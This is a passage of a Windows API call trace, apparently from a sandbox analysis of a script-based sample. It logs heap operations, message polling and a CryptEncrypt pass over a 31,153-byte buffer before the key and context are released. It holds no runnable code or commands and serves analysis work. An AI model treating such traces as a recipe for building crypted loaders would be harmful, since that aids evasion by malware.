0x88cb20 [0043.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0043.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0043.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0043.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0043.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0043.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0043.487] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0043.487] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da328, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da328*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0043.487] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.487] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.487] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.487] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.487] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.487] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.487] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.487] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.487] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0043.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.487] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.488] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.488] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.488] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.488] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.488] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.488] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.488] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0043.488] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.488] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.488] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.488] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.488] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.488] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0043.488] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.489] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.489] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x79a3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x79b0) returned 1 [0043.489] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.489] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.489] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.489] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.489] CharLowerBuffW (in: lpsz="byte[31153]", cchLength=0xb | out: lpsz="byte[31153]") returned 0xb [0043.489] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.490] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.490] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.491] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.491] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.491] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xad8d28*, pdwDataLen=0x6ae220*=0x79a3, dwBufLen=0x79b0 | out: pbData=0xad8d28*, pdwDataLen=0x6ae220*=0x79b0) returned 1 [0043.491] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.491] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.491] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.493] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0043.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.493] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.493] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.493] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.493] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0043.493] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.493] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.493] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.494] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.494] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0043.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.497] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.497] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.497] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.500] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.500] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.511] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0043.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.511] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.511] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.511] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0043.511] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.511] CryptDestroyKey (hKey=0x7c2280) returned 1 [0043.512] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.512] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.512] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0043.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.512] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.512] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.512] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0043.512] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0043.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0043.512] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.512] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.512] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0043.512] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0043.512] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.512] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.512] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.513] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.513] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0043.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.513] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.513] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.513] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.513] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.513] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.513] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0043.513] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0043.513] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.513] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0043.513] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.513] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0043.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0043.513] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.513] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.514] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0043.514] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.514] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.514] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.514] FreeLibrary (hLibModule=0x754b0000) returned 1 [0043.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0043.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0043.514] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0043.514] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.514] HeapFree (in: 